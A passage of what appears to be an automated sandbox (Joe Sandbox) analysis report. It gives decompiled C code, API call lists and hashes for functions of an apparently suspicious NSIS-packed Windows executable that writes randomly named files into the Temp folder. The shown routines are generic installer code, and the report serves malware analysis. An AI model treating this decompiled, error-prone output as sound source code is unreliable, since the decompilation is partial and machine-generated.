                                  						if(_t54 != _t49) {
                                  							E004034AF(_t49);
                                  							E00403499(_t54,  *(_t61 - 0x44));
                                  							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                                  							 *(_t61 - 0x10) = _t59;
                                  							if(_t59 != _t49) {
                                  								E004032B4( *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                                  								while( *_t59 != _t49) {
                                  									_t60 = _t59 + 8;
                                  									 *(_t61 - 0x3c) =  *_t59;
                                  									E00405FB2( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                                  									_t59 = _t60 +  *(_t61 - 0x3c);
                                  								}
                                  								GlobalFree( *(_t61 - 0x10));
                                  							}
                                  							E004060A9( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                                  							GlobalFree(_t54);
                                  							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                                  						}
                                  					}
                                  					_t52 = E004032B4( *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                                  					CloseHandle( *(_t61 + 8));
                                  				}
                                  				_t56 = 0xfffffff3;
                                  				if(_t52 < _t49) {
                                  					_t56 = 0xffffffef;
                                  					DeleteFileW( *(_t61 - 0x40));
                                  					 *((intOrPtr*)(_t61 - 4)) = 1;
                                  				}
                                  				_push(_t56);
                                  				E00401423();
                                  				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t61 - 4));
                                  				return 0;
                                  			}














                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                  • GlobalFree.KERNEL32 ref: 00402A06
                                  • GlobalFree.KERNEL32 ref: 00402A19
                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                  • String ID:
                                  • API String ID: 2667972263-0
                                  • Opcode ID: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                  • Instruction ID: f067c9a989b14af8d706ebefa04c24d1529afff37e35bb6a261b9bb9a52bb1c4
                                  • Opcode Fuzzy Hash: 434c5aa2fa4661cc93f8b90accf7d486b4cf32dd195f8743aa915133d4078579
                                  • Instruction Fuzzy Hash: 71318F71D01114BBCF216FA5CE49D9EBE79EF09364F14023AF550762E0CB794D429B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 48%
                                  			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                  				void* _v8;
                                  				int _v12;
                                  				short _v536;
                                  				void* _t27;
                                  				signed int _t33;
                                  				intOrPtr* _t35;
                                  				signed int _t45;
                                  				signed int _t46;
                                  				signed int _t47;
                                  
                                  				_t46 = _a12;
                                  				_t47 = _t46 & 0x00000300;
                                  				_t45 = _t46 & 0x00000001;
                                  				_t27 = E00406374(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                  				if(_t27 == 0) {
                                  					if((_a12 & 0x00000002) == 0) {
                                  						L3:
                                  						_push(0x105);
                                  						_push( &_v536);
                                  						_push(0);
                                  						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                  							__eflags = _t45;
                                  							if(__eflags != 0) {
                                  								L10:
                                  								RegCloseKey(_v8);
                                  								return 0x3eb;
                                  							}
                                  							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                  							__eflags = _t33;
                                  							if(_t33 != 0) {
                                  								break;
                                  							}
                                  							_push(0x105);
                                  							_push( &_v536);
                                  							_push(_t45);
                                  						}
                                  						RegCloseKey(_v8);
                                  						_t35 = E004068D4(3);
                                  						if(_t35 != 0) {
                                  							return  *_t35(_a4, _a8, _t47, 0);
                                  						}
                                  						return RegDeleteKeyW(_a4, _a8);
                                  					}
                                  					_v12 = 0;
                                  					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                  						goto L10;
                                  					}
                                  					goto L3;
                                  				}
                                  				return _t27;
                                  			}













                                  APIs
                                  • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CloseEnum$DeleteValue
                                  • String ID:
                                  • API String ID: 1354259210-0
                                  • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                  • Instruction ID: cc42e232b24e5cb949d5075bafdc516cc04fbeb950a3b4618317dae0e566d145
                                  • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                  • Instruction Fuzzy Hash: F3216B7150010ABBDF11AF90CE89EEF7B7DEB50384F100076F909B21E1D7B49E54AA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00401D81(void* __ebx, void* __edx) {
                                  				struct HWND__* _t30;
                                  				WCHAR* _t38;
                                  				void* _t48;
                                  				void* _t53;
                                  				signed int _t55;
                                  				signed int _t60;
                                  				long _t63;
                                  				void* _t65;
                                  
                                  				_t53 = __ebx;
                                  				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
                                  					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
                                  				} else {
                                  					E00402D84(2);
                                  					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
                                  				}
                                  				_t55 =  *(_t65 - 0x24);
                                  				 *(_t65 + 8) = _t30;
                                  				_t60 = _t55 & 0x00000004;
                                  				 *(_t65 - 0x38) = _t55 & 0x00000003;
                                  				 *(_t65 - 0x18) = _t55 >> 0x1f;
                                  				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
                                  				if((_t55 & 0x00010000) == 0) {
                                  					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
                                  				} else {
                                  					_t38 = E00402DA6(0x11);
                                  				}
                                  				 *(_t65 - 0x44) = _t38;
                                  				GetClientRect( *(_t65 + 8), _t65 - 0x60);
                                  				asm("sbb esi, esi");
                                  				_t63 = LoadImageW( ~_t60 &  *0x42a220,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
                                  				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
                                  				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
                                  					DeleteObject(_t48);
                                  				}
                                  				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
                                  					_push(_t63);
                                  					E0040644E();
                                  				}
                                  				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t65 - 4));
                                  				return 0;
                                  			}












                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                  • String ID:
                                  • API String ID: 1849352358-0
                                  • Opcode ID: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                  • Instruction ID: 2ec253bf93b3ee2af7d9c2e9edfaee5893d577595a7c220e34a49f748079806b
                                  • Opcode Fuzzy Hash: ac67a32c1c63d157babab1e4358f55078bade20f941efb87d7a14794f6aec10b
                                  • Instruction Fuzzy Hash: 9F212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389D51DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E00401E4E(intOrPtr __edx) {
                                  				void* __edi;
                                  				int _t9;
                                  				signed char _t15;
                                  				struct HFONT__* _t18;
                                  				intOrPtr _t30;
                                  				void* _t31;
                                  				struct HDC__* _t33;
                                  				void* _t35;
                                  
                                  				_t30 = __edx;
                                  				_t33 = GetDC( *(_t35 - 8));
                                  				_t9 = E00402D84(2);
                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                  				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
                                  				ReleaseDC( *(_t35 - 8), _t33);
                                  				 *0x40cdd8 = E00402D84(3);
                                  				_t15 =  *((intOrPtr*)(_t35 - 0x20));
                                  				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
                                  				 *0x40cddf = 1;
                                  				 *0x40cddc = _t15 & 0x00000001;
                                  				 *0x40cddd = _t15 & 0x00000002;
                                  				 *0x40cdde = _t15 & 0x00000004;
                                  				E00406544(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
                                  				_t18 = CreateFontIndirectW(0x40cdc8);
                                  				_push(_t18);
                                  				_push(_t31);
                                  				E0040644E();
                                  				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t35 - 4));
                                  				return 0;
                                  			}












                                  APIs
                                  • GetDC.USER32(?), ref: 00401E51
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                  • ReleaseDC.USER32 ref: 00401E84
                                    • Part of subcall function 00406544: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                    • Part of subcall function 00406544: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,004226E8,?,004055A0,004226E8,00000000), ref: 00406743
                                  • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2584051700-0
                                  • Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                                  • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                  • Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                                  • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 59%
                                  			E00401C43(intOrPtr __edx) {
                                  				int _t29;
                                  				long _t30;
                                  				signed int _t32;
                                  				WCHAR* _t35;
                                  				long _t36;
                                  				int _t41;
                                  				signed int _t42;
                                  				int _t46;
                                  				int _t56;
                                  				intOrPtr _t57;
                                  				struct HWND__* _t63;
                                  				void* _t64;
                                  
                                  				_t57 = __edx;
                                  				_t29 = E00402D84(3);
                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                  				 *(_t64 - 0x18) = _t29;
                                  				_t30 = E00402D84(4);
                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                  				 *(_t64 + 8) = _t30;
                                  				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                  					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                  				}
                                  				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                  				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                  					 *(_t64 + 8) = E00402DA6(0x44);
                                  				}
                                  				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                  				_push(1);
                                  				if(__eflags != 0) {
                                  					_t61 = E00402DA6();
                                  					_t32 = E00402DA6();
                                  					asm("sbb ecx, ecx");
                                  					asm("sbb eax, eax");
                                  					_t35 =  ~( *_t31) & _t61;
                                  					__eflags = _t35;
                                  					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                  					goto L10;
                                  				} else {
                                  					_t63 = E00402D84();
                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                  					_t41 = E00402D84(2);
                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                  					_t56 =  *(_t64 - 0x1c) >> 2;
                                  					if(__eflags == 0) {
                                  						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                  						L10:
                                  						 *(_t64 - 0x38) = _t36;
                                  					} else {
                                  						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                  						asm("sbb eax, eax");
                                  						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                  					}
                                  				}
                                  				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                  				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                  					_push( *(_t64 - 0x38));
                                  					E0040644E();
                                  				}
                                  				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
                                  				return 0;
                                  			}















                                  APIs
                                  • SendMessageTimeoutW.USER32 ref: 00401CB3
                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                  • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                                  • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                  • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 77%
                                  			E00404D10(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                  				char _v68;
                                  				char _v132;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t23;
                                  				signed int _t24;
                                  				void* _t31;
                                  				void* _t33;
                                  				void* _t34;
                                  				void* _t44;
                                  				signed int _t46;
                                  				signed int _t50;
                                  				signed int _t52;
                                  				signed int _t53;
                                  				signed int _t55;
                                  
                                  				_t23 = _a16;
                                  				_t53 = _a12;
                                  				_t44 = 0xffffffdc;
                                  				if(_t23 == 0) {
                                  					_push(0x14);
                                  					_pop(0);
                                  					_t24 = _t53;
                                  					if(_t53 < 0x100000) {
                                  						_push(0xa);
                                  						_pop(0);
                                  						_t44 = 0xffffffdd;
                                  					}
                                  					if(_t53 < 0x400) {
                                  						_t44 = 0xffffffde;
                                  					}
                                  					if(_t53 < 0xffff3333) {
                                  						_t52 = 0x14;
                                  						asm("cdq");
                                  						_t24 = 1 / _t52 + _t53;
                                  					}
                                  					_t25 = _t24 & 0x00ffffff;
                                  					_t55 = _t24 >> 0;
                                  					_t46 = 0xa;
                                  					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                  				} else {
                                  					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                  					_t50 = 0;
                                  				}
                                  				_t31 = E00406544(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                  				_t33 = E00406544(_t44, _t50, _t55,  &_v132, _t44);
                                  				_t34 = E00406544(_t44, _t50, 0x423708, 0x423708, _a8);
                                  				wsprintfW(_t34 + lstrlenW(0x423708) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                  				return SetDlgItemTextW( *0x4291f8, _a4, 0x423708);
                                  			}



















                                  APIs
                                  • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                  • wsprintfW.USER32 ref: 00404DBA
                                  • SetDlgItemTextW.USER32 ref: 00404DCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: ItemTextlstrlenwsprintf
                                  • String ID: %u.%u%s%s
                                  • API String ID: 3540041739-3551169577
                                  • Opcode ID: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
                                  • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                                  • Opcode Fuzzy Hash: 86e502d9a8370dbc93398d3fbd174d64265af359c40653ed6c33f1a653f0c3b2
                                  • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00405DD6(WCHAR* _a4) {
                                  				WCHAR* _t9;
                                  
                                  				_t9 = _a4;
                                  				_push( &(_t9[lstrlenW(_t9)]));
                                  				_push(_t9);
                                  				if( *(CharPrevW()) != 0x5c) {
                                  					lstrcatW(_t9, 0x40a014);
                                  				}
                                  				return _t9;
                                  			}




                                  APIs
                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                                  • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CharPrevlstrcatlstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 2659869361-3916508600
                                  • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                  • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                                  • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                  • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403019(intOrPtr _a4) {
                                  				long _t2;
                                  				struct HWND__* _t3;
                                  				struct HWND__* _t6;
                                  
                                  				if(_a4 == 0) {
                                  					if( *0x420ec0 == 0) {
                                  						_t2 = GetTickCount();
                                  						if(_t2 >  *0x42a22c) {
                                  							_t3 = CreateDialogParamW( *0x42a220, 0x6f, 0, E00402F93, 0);
                                  							 *0x420ec0 = _t3;
                                  							return ShowWindow(_t3, 5);
                                  						}
                                  						return _t2;
                                  					} else {
                                  						return E00406910(0);
                                  					}
                                  				} else {
                                  					_t6 =  *0x420ec0;
                                  					if(_t6 != 0) {
                                  						_t6 = DestroyWindow(_t6);
                                  					}
                                  					 *0x420ec0 = 0;
                                  					return _t6;
                                  				}
                                  			}






                                  APIs
                                  • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                                  • GetTickCount.KERNEL32 ref: 0040304A
                                  • CreateDialogParamW.USER32 ref: 00403067
                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                  • String ID:
                                  • API String ID: 2102729457-0
                                  • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                  • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                                  • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                                  • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E004054DD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                  				int _t15;
                                  				long _t16;
                                  
                                  				_t15 = _a8;
                                  				if(_t15 != 0x102) {
                                  					if(_t15 != 0x200) {
                                  						_t16 = _a16;
                                  						L7:
                                  						if(_t15 == 0x419 &&  *0x4236f4 != _t16) {
                                  							_push(_t16);
                                  							_push(6);
                                  							 *0x4236f4 = _t16;
                                  							E00404E9E();
                                  						}
                                  						L11:
                                  						return CallWindowProcW( *0x4236fc, _a4, _t15, _a12, _t16);
                                  					}
                                  					if(IsWindowVisible(_a4) == 0) {
                                  						L10:
                                  						_t16 = _a16;
                                  						goto L11;
                                  					}
                                  					_t16 = E00404E1E(_a4, 1);
                                  					_t15 = 0x419;
                                  					goto L7;
                                  				}
                                  				if(_a12 != 0x20) {
                                  					goto L10;
                                  				}
                                  				E004044AF(0x413);
                                  				return 0;
                                  			}





                                  APIs
                                  • IsWindowVisible.USER32(?), ref: 0040550C
                                  • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                                    • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Window$CallMessageProcSendVisible
                                  • String ID:
                                  • API String ID: 3748168415-3916222277
                                  • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                  • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                                  • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                                  • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E004063D5(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                  				int _v8;
                                  				long _t21;
                                  				long _t24;
                                  				char* _t30;
                                  
                                  				asm("sbb eax, eax");
                                  				_v8 = 0x800;
                                  				_t21 = E00406374(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                  				_t30 = _a16;
                                  				if(_t21 != 0) {
                                  					L4:
                                  					 *_t30 =  *_t30 & 0x00000000;
                                  				} else {
                                  					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                  					_t21 = RegCloseKey(_a20);
                                  					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                  					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                  						goto L4;
                                  					}
                                  				}
                                  				return _t21;
                                  			}








                                  APIs
